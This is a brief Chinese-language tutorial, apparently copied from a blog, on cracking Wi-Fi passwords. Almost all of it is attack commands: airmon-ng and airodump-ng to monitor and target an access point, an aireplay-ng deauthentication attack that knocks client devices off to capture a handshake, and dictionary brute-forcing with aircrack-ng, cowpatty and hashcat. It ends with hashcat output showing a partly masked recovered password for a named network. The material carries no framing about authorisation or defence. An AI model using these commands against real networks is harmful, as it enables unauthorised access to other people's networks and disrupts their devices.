进行无线渗透的步骤包括一下几点:
1.查看可用的无线网卡
airmon-ng或者
ifconfig -a
2.在kali下启动无线网卡的监听模式
airmon-ng start wlan1
3.扫描附近的无线网络
airodump-ng wlan1mon 4.使用参数过滤扫描列表,确定扫描目标
airodump-ng -w <扫描结果保存文件名> -c <无线信道> --bssid <目标无线 AP 的硬件地址> <处于监听模式的网卡名称>
5.使用 aireplay-ng 迫使目标设备重连(用于获取握手信息)
aireplay-ng -<攻击模式(0)> <攻击次数(10)> -a 无线 AP 硬件地址> -c <用户设备硬件地址> <处于监听模式的网卡名称(wlan1mon)>
6.暴力破解 Wi-Fi 密码
6.1 用命令:aircrack-ng -w 密码字典 <包含握手包的 cap 文件>
6.2 用cowpatty破解
第一步:genpmk -f <密码字典,如:dict.txt> -d <存储PMK文件,如:PMK3> -s <wifi名称,如:"TP-LINK_999" >
第二步:cowpatty -d PMK3 -s "TP-LINK_999" -r <存有握手信息的cap文件,如:TP-LINK_999-01.cap>
6.3 用hashcat进行快速破解
hashcat -m 22000 30643_1625972910.hc22000 --force dict.txt
这一步比较麻烦需要将.cap文件通过地址:https://hashcat.net/cap2hashcat/进行上传转换成.hc22000文件,同时要注意6.0.0以后版本只支持这种方式的文件
7.漫长的等待与惊喜...
# hashcat --show -m 22000 20855_1625937129.hc22000
64285937b56c4a29ff0807be9045f404:40313cec2d22:e0ccf871c104:TP-LINK_999
:T***ng666
原文出自:http://pyspiderking.cn/index.php/2021/07/11/wifiscan-pwddict/